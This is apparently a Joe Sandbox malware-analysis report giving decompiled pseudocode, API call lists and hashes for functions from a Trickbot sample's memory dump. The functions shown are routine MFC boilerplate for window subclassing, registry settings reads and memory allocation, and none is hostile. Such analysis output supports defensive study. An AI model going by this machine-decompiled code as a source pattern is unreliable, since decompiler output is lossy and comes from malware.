String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
API String ID: 1041107710-4043335175
Opcode ID: a8f7810314b9d161cd91ad33f6038c1514b542b5b235c2bf98f7ccbcde4e074b
Instruction ID: 0e85794538d9c9c3d52b96bdff513c674c559b15789a36988b976b88e38e0e93
Opcode Fuzzy Hash: a8f7810314b9d161cd91ad33f6038c1514b542b5b235c2bf98f7ccbcde4e074b
Instruction Fuzzy Hash: 3FD16C71D0020AEEDF00EFA5C985AEEBBB9AF18305F14541AF504B2291DB799E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041892F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0041892F(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				long _t40;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00405340(E004377D8, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E0041884D(_t75,  *(_t75 + 0x14));
					E004185B5(_t61, E0041884D(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00418616(E0041884D(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								_t40 = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
								 *(_t75 - 0x14) = _t40;
							} else {
								_t74 = E0041884D(_t75, _t68);
								E00418519(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E0041853C(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

0x0041892f
0x0041892f
0x00418934
0x0041893f
0x00418942
0x00418947
0x0041894c
0x00418952
0x00418956
0x0041895a
0x00418962
0x00418965
0x00418966
0x00418a1c
0x00418a2e
0x00000000
0x0041896c
0x0041896c
0x0041896f
0x00418a14
0x00418a33
0x00418a35
0x00000000
0x00000000
0x00418975
0x00418975
0x00418978
0x004189da
0x004189e2
0x004189f0
0x00000000
0x0041897a
0x0041897f
0x00418a37
0x00418a44
0x00418a4a
0x00418985
0x0041898b
0x00418996
0x004189aa
0x004189b0
0x004189b3
0x004189b9
0x004189ba
0x004189bb
0x004189bb
0x0041897f
0x00418978
0x0041896f
0x004189c8
0x004189d1

APIs

__EH_prolog.LIBCMT ref: 00418934
GetPropA.USER32(?,AfxOldWndProc423), ref: 0041894C
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004189AA

Part of subcall function 0041853C: GetWindowRect.USER32(?,?), ref: 00418561
Part of subcall function 0041853C: GetWindow.USER32(?,00000004), ref: 0041857E

SetWindowLongA.USER32(?,000000FC,?), ref: 004189DA
RemovePropA.USER32(?,AfxOldWndProc423), ref: 004189E2
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 004189E9
GlobalDeleteAtom.KERNEL32(00000000), ref: 004189F0

Part of subcall function 00418519: GetWindowRect.USER32(?,?), ref: 00418525

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00418A44

Strings

AfxOldWndProc423, xrefs: 00418942, 0041894A, 004189E0, 004189E8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: d2fd6f990285d39a6d87cebec84d2e2769cf57fe8e2d542f4c104503553590e1
Instruction ID: def6d9af7fd9a420a759b2c8fd090f95103d8fe4d7864d47780bde64d7efd21c
Opcode Fuzzy Hash: d2fd6f990285d39a6d87cebec84d2e2769cf57fe8e2d542f4c104503553590e1
Instruction Fuzzy Hash: 6A313A72800119BBCB02AFA5DD49EFF7B79EF49354F00412EF901A2151CB7989919BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004329E7, Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004329E7() {
				void* __ecx;
				void* __ebp;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x44b4bc
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x1cbf10
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x1cbf10
							GlobalLock(GlobalHandle( *_t15));
							LeaveCriticalSection( *(_t74 + 0x14));
							E0041564B(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E00405360(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x1cbf10
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x1cbf10
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x1cbf10
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

0x004329eb
0x004329ee
0x004329ee
0x004329f2
0x004329f6
0x004329fc
0x004329fc
0x004329ff
0x004329ff
0x00432a04
0x00432a13
0x00432a15
0x00432a18
0x00432a35
0x00432a35
0x00432a35
0x00432a38
0x00432a3e
0x00432a5a
0x00432a5d
0x00432a6f
0x00432a40
0x00432a4b
0x00432a4b
0x00432a7b
0x00432a81
0x00432a83
0x00432a8d
0x00432a93
0x00432a99
0x00432a99
0x00432aa4
0x00432aa6
0x00432abd
0x00432ac2
0x00432ac5
0x00432ac8
0x00432a1a
0x00432a1a
0x00432a1d
0x00432a20
0x00432a25
0x00432a26
0x00432a2b
0x00000000
0x00000000
0x00000000
0x00432a2b
0x00432a2f
0x00000000
0x00000000
0x00432a2f
0x00432a06
0x00432a06
0x00432a0d
0x00000000
0x00000000
0x00432a0d
0x00432acc
0x00432acf
0x00432ad1
0x00432ad4
0x00432ad4
0x00432ad7
0x00432ada
0x00432ae5
0x00432ae8
0x00432aeb
0x00432af8

APIs

EnterCriticalSection.KERNEL32(0044B4BC,0044B2EC,00000000,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 004329F6
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A4B
GlobalHandle.KERNEL32(001CBF10), ref: 00432A54
GlobalUnlock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A5D
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00432A6F
GlobalHandle.KERNEL32(001CBF10), ref: 00432A86
GlobalLock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A8D
LeaveCriticalSection.KERNEL32(00405287,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A93
GlobalLock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432AA2
LeaveCriticalSection.KERNEL32(?), ref: 00432AEB

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 2f7465d992080110dd1e2c3ff5dbbd224f692032a86fb3c78edd8e679525e611
Instruction ID: 98b49dcb7c7969d299e935ac0ecca1364499eaedbc17bfe6428f456728b09796
Opcode Fuzzy Hash: 2f7465d992080110dd1e2c3ff5dbbd224f692032a86fb3c78edd8e679525e611
Instruction Fuzzy Hash: 0D316071600705AFDB24DF28DD89A2BB7E9FB48305F00592EE956C3661D7B5EC048B14

Uniqueness

Uniqueness Score: -1.00%

Function 00431F87, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00431F87(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				long _t21;
				long _t27;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8); // executed
				if(_t21 == 0) {
					_t27 = RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20); // executed
					if(_t27 == 0) {
						RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20); // executed
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8); // executed
				}
				if(_v12 != 0) {
					RegCloseKey(_v12); // executed
				}
				return _v16;
			}

0x00431f9d
0x00431fa9
0x00431fac
0x00431faf
0x00431fb2
0x00431fb5
0x00431fbd
0x00431fd8
0x00431fdc
0x00431ff7
0x00431ff7
0x00431fdc
0x00432002
0x00432007
0x00432007
0x0043200c
0x00432011
0x00432011
0x0043201a

APIs

RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
RegCloseKey.KERNEL32(?), ref: 00432007
RegCloseKey.KERNEL32(?), ref: 00432011

Strings

software, xrefs: 00431F9F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 939ff842e9c6595b817828ae10e83e6ce885d2835caf59c2e690572aef84774d
Instruction ID: 22bfda63fbbbe92fa5461a2b50590be62385f2120e4bb363b446014f6f283299
Opcode Fuzzy Hash: 939ff842e9c6595b817828ae10e83e6ce885d2835caf59c2e690572aef84774d
Instruction Fuzzy Hash: 5B11D476900118BACB21DB96DD84DEFFFBCEF89700F1040AAA504A2121D2B09E44DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041CBB0, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041CBB0(void* __ecx) {
				int _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 = GetSystemMetrics(0xb); // executed
				 *(_t18 + 8) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E00432790();
				} else {
					E00432760();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x0041cbb9
0x0041cbbd
0x0041cbc1
0x0041cbca
0x0041cbcd
0x0041cbd6
0x0041cbcf
0x0041cbcf
0x0041cbcf
0x0041cbe9
0x0041cbf3
0x0041cbfb
0x0041cc07

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041CBBD
GetSystemMetrics.USER32(0000000C), ref: 0041CBC4
GetDC.USER32(00000000), ref: 0041CBDD
GetDeviceCaps.GDI32(00000000,00000058), ref: 0041CBEE
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041CBF6
ReleaseDC.USER32(00000000,00000000), ref: 0041CBFE

Part of subcall function 00432760: GetSystemMetrics.USER32(00000002), ref: 00432772
Part of subcall function 00432760: GetSystemMetrics.USER32(00000003), ref: 0043277C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 728d5a1868a233504d2a31b1683231eee4185b1accb182d5150eb7b0aef3dae5
Instruction ID: 08fc2840edf26341d66665d218ae6a8697be2df0d04b0a9dfdbe7d33530523c6
Opcode Fuzzy Hash: 728d5a1868a233504d2a31b1683231eee4185b1accb182d5150eb7b0aef3dae5
Instruction Fuzzy Hash: 86F0B470580700AAE7206BB29C8AF6777A4FB80756F00442EE20197290CBF8AC05CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00431642, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00431642(void* __ecx) {
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr _t22;
				void* _t26;
				void* _t28;

				E00405340(E004381EA, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *((intOrPtr*)(_t28 + 8)) != 0) {
					_t22 = E0041BDEB(0x20);
					 *((intOrPtr*)(_t28 - 0x10)) = _t22;
					 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
					if(_t22 == 0) {
						_t16 = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t28 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t16 = E0041E286(_t22);
					}
					 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t26 + 0xa8)) = _t16;
					 *((intOrPtr*)( *_t16 + 0xc))();
				}
				_t14 = E00432061(_t26, "Settings", "PreviewPages", 0); // executed
				 *((intOrPtr*)(_t26 + 0xb4)) = _t14;
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t14;
			}

0x00431647
0x0043164c
0x00431652
0x00431654
0x0043165e
0x00431660
0x00431663
0x00431669
0x00431683
0x0043166b
0x0043166b
0x0043166d
0x00431670
0x00431675
0x0043167a
0x0043167c
0x0043167c
0x00431685
0x00431689
0x00431693
0x00431693
0x004316a4
0x004316ac
0x004316b3
0x004316bb

APIs

__EH_prolog.LIBCMT ref: 00431647

Part of subcall function 0041E286: __EH_prolog.LIBCMT ref: 0041E28B

Strings

Settings, xrefs: 0043169D
PreviewPages, xrefs: 00431698
File%d, xrefs: 00431670
Recent File List, xrefs: 00431675

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 3519838083-526586445
Opcode ID: 6f3b7b15778d497f2daf6d44c491ab8a82701b9e33e79a2c74c78f34a279aae3
Instruction ID: c105981f393b24eba65fe84dcabe9daa351ab0f1483bca60c1a014263f27ad1c
Opcode Fuzzy Hash: 6f3b7b15778d497f2daf6d44c491ab8a82701b9e33e79a2c74c78f34a279aae3
Instruction Fuzzy Hash: 7501A931B41704BBDB689FB4D802B9EB6B1EB0CB19F20512FB515A62C1C7BC5541875C

Uniqueness

Uniqueness Score: -1.00%

Function 004320CD, Relevance: 7.6, APIs: 5, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004320CD(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* _t46;
				long _t47;
				CHAR* _t59;
				void* _t61;
				CHAR* _t64;
				void* _t78;

				_t61 = __ecx;
				E00405340(E00438308, _t78);
				E00405B80(0x100c, __ecx);
				 *(_t78 - 0x14) = 0;
				if( *((intOrPtr*)(_t61 + 0x7c)) == 0) {
					__eflags =  *(_t78 + 0x14);
					if( *(_t78 + 0x14) == 0) {
						 *(_t78 + 0x14) = 0x449788;
					}
					GetPrivateProfileStringA( *(_t78 + 0xc),  *(_t78 + 0x10),  *(_t78 + 0x14), _t78 - 0x1018, 0x1000,  *(_t61 + 0x90));
					_push(_t78 - 0x1018);
					goto L12;
				} else {
					_t46 = E0043201B(_t61,  *(_t78 + 0xc)); // executed
					 *(_t78 - 0x10) = _t46;
					if(_t46 != 0) {
						_t64 =  *0x447478; // 0x44748c
						 *(_t78 + 0xc) = _t64;
						 *(_t78 - 4) = 0;
						_t47 = RegQueryValueExA(_t46,  *(_t78 + 0x10), 0, _t78 - 0x14, 0, _t78 - 0x18); // executed
						_t59 = _t47;
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = RegQueryValueExA( *(_t78 - 0x10),  *(_t78 + 0x10), 0, _t78 - 0x14, E004181F7(_t78 + 0xc, _t78,  *(_t78 - 0x18)), _t78 - 0x18);
							E00418246(_t78 + 0xc, __eflags, 0xffffffff);
						}
						RegCloseKey( *(_t78 - 0x10)); // executed
						__eflags = _t59;
						if(_t59 != 0) {
							E00417F36( *((intOrPtr*)(_t78 + 8)), _t78,  *(_t78 + 0x14));
						} else {
							E00417C3D( *((intOrPtr*)(_t78 + 8)), _t78 + 0xc);
						}
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E00417EC8(_t78 + 0xc);
					} else {
						_push( *(_t78 + 0x14));
						L12:
						E00417F36( *((intOrPtr*)(_t78 + 8)), _t78);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
				return  *((intOrPtr*)(_t78 + 8));
			}

0x004320cd
0x004320d2
0x004320dc
0x004320e7
0x004320ea
0x00432190
0x00432193
0x00432195
0x00432195
0x004321b7
0x004321c3
0x00000000
0x004320f0
0x004320f3
0x004320fa
0x004320fd
0x00432107
0x0043210f
0x00432122
0x00432129
0x0043212b
0x0043212d
0x0043212f
0x00432153
0x00432155
0x00432155
0x0043215d
0x00432164
0x00432167
0x0043217d
0x00432169
0x00432170
0x00432170
0x00432182
0x00432189
0x004320ff
0x004320ff
0x004321c4
0x004321c7
0x004321c7
0x004320fd
0x004321d3
0x004321db

APIs

__EH_prolog.LIBCMT ref: 004320D2
RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 00432129
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 0043214C
RegCloseKey.KERNEL32(?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 0043215D
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 004321B7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: QueryValue$CloseH_prologPrivateProfileString
String ID:
API String ID: 1022837590-0
Opcode ID: 261c40d04a992bcf139e5b40edf533778dbb3864d506c50773edb15034eb117e
Instruction ID: 4479ac512a49c133f8d7ecca0d800d9f8e6ddc368908ae10fc8aa11e92d8ef72
Opcode Fuzzy Hash: 261c40d04a992bcf139e5b40edf533778dbb3864d506c50773edb15034eb117e
Instruction Fuzzy Hash: 1D31583190010AEBCF15DF91CE40CEEBB79EB48354F10812BFA25A61A0D7B59A56DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408838, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408838() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x44d0b4; // 0x1
				_t26 =  *0x44d0a4; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x44d0b8; // 0x13507d0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x44d0bc, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x44d0b4 =  *0x44d0b4 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x44d0bc, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x44d0bc, 0,  *0x44d0b8, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x44d0a4 =  *0x44d0a4 + 0x10;
				 *0x44d0b8 = _t25;
				_t15 =  *0x44d0b4; // 0x1
				goto L3;
			}

0x00408838
0x0040883d
0x00408849
0x0040887b
0x0040887b
0x00408891
0x00408894
0x0040889c
0x0040889f
0x004088cb
0x00000000
0x004088cb
0x004088ae
0x004088b6
0x004088b9
0x004088cf
0x004088d3
0x004088d5
0x004088d8
0x004088e1
0x00000000
0x004088e4
0x004088c5
0x00000000
0x004088c5
0x0040884b
0x00408860
0x00408868
0x00000000
0x00000000
0x0040886a
0x00408871
0x00408876
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 00408860
RtlAllocateHeap.NTDLL(00000008,000041C4,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 00408894
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 004088AE
HeapFree.KERNEL32(00000000,?), ref: 004088C5

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 7785a32c3870f01c1921b0e29ee540b386b862605303c0bce40db1a70a1ecdaa
Instruction ID: 39bf4ac56edb5d8f9557d9b7b1b9dd991b5dd42185a64f63e89d9d0ee6540605
Opcode Fuzzy Hash: 7785a32c3870f01c1921b0e29ee540b386b862605303c0bce40db1a70a1ecdaa
Instruction Fuzzy Hash: DE118C35A04601AFD7309F58ED459227BB6FF96328B504A3EF2A1E72B0C7709806CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00432061, Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00432061(void* __ecx, int _a4, CHAR* _a8, int _a12) {
				char _v8;
				int _v12;
				int _t14;
				void* _t15;
				long _t19;
				void* _t27;

				_push(__ecx);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x90));
				} else {
					_t15 = E0043201B(__ecx, _a4); // executed
					_t27 = _t15;
					if(_t27 != 0) {
						_a4 = 4;
						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4); // executed
						RegCloseKey(_t27); // executed
